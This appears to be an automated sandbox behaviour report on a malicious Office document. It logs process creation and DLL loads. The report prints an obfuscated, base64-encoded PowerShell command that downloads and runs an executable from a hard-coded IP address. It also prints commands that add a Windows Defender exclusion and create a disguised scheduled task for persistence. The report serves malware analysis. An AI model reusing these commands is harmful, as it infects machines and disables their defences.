                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D56.tmp" "c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sihost.exe "C:\Users\user\AppData\Roaming\sihost.exe"
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp"
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Users\user\AppData\Roaming\sihost.exe "C:\Users\user\AppData\Roaming\sihost.exe"
                        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {6C210698-E638-4D51-B8D8-9F29DBC70A32} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmpA3FD.tmp"
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sihost.exe "C:\Users\user\AppData\Roaming\sihost.exe" Jump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D56.tmp" "c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Users\user\AppData\Roaming\sihost.exe "C:\Users\user\AppData\Roaming\sihost.exe"Jump to behavior
                        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmpA3FD.tmp"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Users\user\AppData\Roaming\bKVNuVuE.exe "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
